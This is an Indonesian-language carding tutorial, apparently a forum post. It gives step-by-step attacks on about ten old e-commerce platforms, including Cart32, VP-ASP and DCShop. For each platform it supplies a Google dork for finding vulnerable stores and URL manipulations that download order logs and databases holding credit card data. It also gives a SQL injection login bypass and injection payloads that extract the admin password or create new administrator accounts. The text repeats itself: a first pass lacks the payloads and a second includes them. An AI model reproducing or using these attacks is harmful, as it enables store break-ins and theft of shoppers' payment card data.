Carding
1. contoh bugs pada bentuk toko sistem shopadmin
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
Ketik google.com :-–> allinurl:/shopadmin.asp
Contoh target : www.cendol.com/shopadmin.asp
Kelemahan sistem ini bila penjahat memasukan kode injection seperti :
2. contoh bugs pada bentuk toko sistem Index CGI
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com : Ketik –>
allinurl:/store/index.cgi/page=
Contoh target : _www.cendol.com/cgi-bin/store/index.cgi?page=short_blue.htm
Hapus short_blue.htm dan ganti dengan –> /admin/files/order.log
seperti ini :
_www.cendol.com/cgi-bin/store/index.cgi?page=/admin/files/
order.log
3. contoh bugs pada bentuk toko sistem metacart
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com : --> allinurl:/metacart/
Contoh target : _www.cendol.com/metacart/about.asp
Hapus about.asp dan ganti dengan –> /database/metacart.mdb
Hasilnya : _www.cendol.com/metacart/database/metacart.mdb
4. contoh bugs pada bentuk toko sistem DCShop
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com : Ketik –> allinurl:/DCShop/
Contoh : _www.cendol.com/xxxx/DCShop/xxxx
Hapus /DCShop/xxxx dan ganti dengan –> /DCShop/orders/orders.txt
atau /DCShop/Orders/orders.txt
Hasilnya : _www.cendol.com/xxxx/DCShop/orders/orders.txt
5. contoh bugs pada bentuk toko sistem PDshopro
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com : Ketik –> allinurl:/shop/category.asp/catid=
Contoh : _www.cendol.com/shop/category.asp/catid=xxxxxx
Hapus /shop/category.asp/catid=xxxxx dan ganti dengan –> /admin/
dbsetup.asp
Hasilnya : _www.cendol.com/admin/dbsetup.asp
Dari keterangan diatas, kita dapati file databasenya dgn nama
sdatapdshoppro.mdb
Download file sdatapdshoppro.mdb dengan merubah url nya menjadi
_www.cendol.com/data/pdshoppro.mdb
Buka file tsb pakai Microsoft Acces (karena untuk membaca database
access.mdb sebaiknya pake ms access aja)
6. contoh bugs pada bentuk toko sistem : commerceSQL
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti google.com lalu Ketik –> allinurl:/commercesql/
Contoh : _www.cendol.com/commercesql/xxxxx
Hapus commercesql/xxxxx dan ganti dengan –>
cgi-bin/commercesql/index.cgi?page=
Hasilnya : _www.cendol.com/cgi-bin/commercesql/index.cgi?page=
Untuk melihat admin config :
_www.cendol.com/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl
Untuk melihat admin manager :
_www.cendol.com/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi
Untuk melihat file log/CCnya :
_www.cendol.com/cgi-bin/commercesql/index.cgi?page=../admin/files/order…
7. contoh bugs pada bentuk toko sistem EShop
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google: Ketik : allinurl:/eshop/
Contoh : _www.cendol.com/xxxxx/eshop
Hapus /eshop dan ganti dengan –> /cg-bin/eshop/database/order.mdb
Hasilnya : _www.cendol.com/…/cg-bin/eshop/database/order.mdb
Download file *.mdb nya dan Buka file tsb pakai Microsoft Acces
(karena untuk membaca database access.mdb sebaiknya pake ms access
aja)
8. contoh bugs pada bentuk toko sistem Cart32 v3.5a
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com: Ketik : allinurl:/cart32.exe/
Contoh : _www.cendol.net/wrburns_s/cgi-bin/cart32.exe/NoItemFound
Ganti NoItemFound dengan –> error
Bila mendapati page error dgn keterangan instalasi dibawahnya, berarti kita sukses! Sekarang, kita menuju pada keterangan di bawahnya, geser halaman kebawah, dan cari bagian Page Setup and Directory Kalau dibagian tersebut terdapat list file dgn format/akhiran .c32
berarti di site tsb. terdapat file berisi data CC Copy salah satu file .c32 yg ada atau semuanya ke notepad atau program
text editor lainnya.
Ganti string url tersebut menjadi seperti ini : hxxp://www.cendol.net/wrburns_s/cgi-bin/cart32/
Nah.., paste satu per satu, file .c32 ke akhir url yg sudah dimodifikasi tadi, dengan format
hxxp://www.cendol.com/cart32/
Contoh :
hxxp://www.cendol.net/wrburns_s/cgi-bin/cart32/WRBURNS-001065.c32
9. contoh bugs pada bentuk toko sistem VP-ASP Shopping Cart 5.0
teknik/jalan ke dua
google.com Ketik –> allinurl:/vpasp/shopdisplayproducts.asp
Buka url target dan tambahkan string berikut di akhir bagian shopdisplayproducts.asp
Contoh :
Gantilah nilai dari string url terakhir dgn :
Kalau berhasil, kita akan mendapatkan informasi username dan password admin Untuk login admin ke
silahkan Cari sendiri data CCnya 
10. contoh bugs pada bentuk toko sistem VP-ASP Shopping Cart 5.0
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com : Ketik : allinurl:/vpasp/shopsearch.asp
Buka url target dan utk membuat admin baru, postingkan data berikut
satu per satu pada bagian search engine :
Jangan lupa untuk menggantinya, untuk mengganti password admin, masukkan keyword berikut :
Untuk login admin, ada di
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
Ketik google.com :-–> allinurl:/shopadmin.asp
Contoh target : www.cendol.com/shopadmin.asp
Kelemahan sistem ini bila penjahat memasukan kode injection seperti :
Quote:
| user : ‘or’1 pass : ‘or’1 |
2. contoh bugs pada bentuk toko sistem Index CGI
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com : Ketik –>
allinurl:/store/index.cgi/page=
Contoh target : _www.cendol.com/cgi-bin/store/index.cgi?page=short_blue.htm
Hapus short_blue.htm dan ganti dengan –> /admin/files/order.log
seperti ini :
_www.cendol.com/cgi-bin/store/index.cgi?page=/admin/files/
order.log
3. contoh bugs pada bentuk toko sistem metacart
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com : --> allinurl:/metacart/
Contoh target : _www.cendol.com/metacart/about.asp
Hapus about.asp dan ganti dengan –> /database/metacart.mdb
Hasilnya : _www.cendol.com/metacart/database/metacart.mdb
4. contoh bugs pada bentuk toko sistem DCShop
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com : Ketik –> allinurl:/DCShop/
Contoh : _www.cendol.com/xxxx/DCShop/xxxx
Hapus /DCShop/xxxx dan ganti dengan –> /DCShop/orders/orders.txt
atau /DCShop/Orders/orders.txt
Hasilnya : _www.cendol.com/xxxx/DCShop/orders/orders.txt
5. contoh bugs pada bentuk toko sistem PDshopro
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com : Ketik –> allinurl:/shop/category.asp/catid=
Contoh : _www.cendol.com/shop/category.asp/catid=xxxxxx
Hapus /shop/category.asp/catid=xxxxx dan ganti dengan –> /admin/
dbsetup.asp
Hasilnya : _www.cendol.com/admin/dbsetup.asp
Dari keterangan diatas, kita dapati file databasenya dgn nama
sdatapdshoppro.mdb
Download file sdatapdshoppro.mdb dengan merubah url nya menjadi
_www.cendol.com/data/pdshoppro.mdb
Buka file tsb pakai Microsoft Acces (karena untuk membaca database
access.mdb sebaiknya pake ms access aja)
6. contoh bugs pada bentuk toko sistem : commerceSQL
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti google.com lalu Ketik –> allinurl:/commercesql/
Contoh : _www.cendol.com/commercesql/xxxxx
Hapus commercesql/xxxxx dan ganti dengan –>
cgi-bin/commercesql/index.cgi?page=
Hasilnya : _www.cendol.com/cgi-bin/commercesql/index.cgi?page=
Untuk melihat admin config :
_www.cendol.com/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl
Untuk melihat admin manager :
_www.cendol.com/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi
Untuk melihat file log/CCnya :
_www.cendol.com/cgi-bin/commercesql/index.cgi?page=../admin/files/order…
7. contoh bugs pada bentuk toko sistem EShop
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google: Ketik : allinurl:/eshop/
Contoh : _www.cendol.com/xxxxx/eshop
Hapus /eshop dan ganti dengan –> /cg-bin/eshop/database/order.mdb
Hasilnya : _www.cendol.com/…/cg-bin/eshop/database/order.mdb
Download file *.mdb nya dan Buka file tsb pakai Microsoft Acces
(karena untuk membaca database access.mdb sebaiknya pake ms access
aja)
8. contoh bugs pada bentuk toko sistem Cart32 v3.5a
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com: Ketik : allinurl:/cart32.exe/
Contoh : _www.cendol.net/wrburns_s/cgi-bin/cart32.exe/NoItemFound
Ganti NoItemFound dengan –> error
Bila mendapati page error dgn keterangan instalasi dibawahnya, berarti kita sukses! Sekarang, kita menuju pada keterangan di bawahnya, geser halaman kebawah, dan cari bagian Page Setup and Directory Kalau dibagian tersebut terdapat list file dgn format/akhiran .c32
berarti di site tsb. terdapat file berisi data CC Copy salah satu file .c32 yg ada atau semuanya ke notepad atau program
text editor lainnya.
Ganti string url tersebut menjadi seperti ini : hxxp://www.cendol.net/wrburns_s/cgi-bin/cart32/
Nah.., paste satu per satu, file .c32 ke akhir url yg sudah dimodifikasi tadi, dengan format
hxxp://www.cendol.com/cart32/
Contoh :
hxxp://www.cendol.net/wrburns_s/cgi-bin/cart32/WRBURNS-001065.c32
9. contoh bugs pada bentuk toko sistem VP-ASP Shopping Cart 5.0
teknik/jalan ke dua
google.com Ketik –> allinurl:/vpasp/shopdisplayproducts.asp
Buka url target dan tambahkan string berikut di akhir bagian shopdisplayproducts.asp
Contoh :
Code:
http://cendol.com/vpasp/shopdisplayproducts.asp?cat=qwerty‘%20union%fldpassword%20from%20tbluser%20where%20fldusername=‘admin’%20and%20fldpassword%20like%20′a%25′–
Quote:
| %20′a%25′– %20′b%25′– %20′c%25′– |
Code:
http://cendol.com/vpasp/shopadmin.asp
10. contoh bugs pada bentuk toko sistem VP-ASP Shopping Cart 5.0
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com : Ketik : allinurl:/vpasp/shopsearch.asp
Buka url target dan utk membuat admin baru, postingkan data berikut
satu per satu pada bagian search engine :
Quote:
| Keyword=&category=5); insert into tbluser (fldusername) values (”)–&SubCategory=&hide=&action.x=46&action.y=6 Keyword=&category=5); update tbluser set fldpassword=” where fldusername=”–&SubCategory=All&action.x=33&action. y=6 Keyword=&category=3); update tbluser set fldaccess=’1′ where fldusername=”–&SubCategory=All&action.x=33&action. y=6 |
Quote:
| Keyword=&category=5); update tbluser set fldpassword=” where fldusername=’admin’–&SubCategory=All&action.x=33&a ction.y=6 |
Code:
http://cendol/vpasp/shopadmin.asp
Comments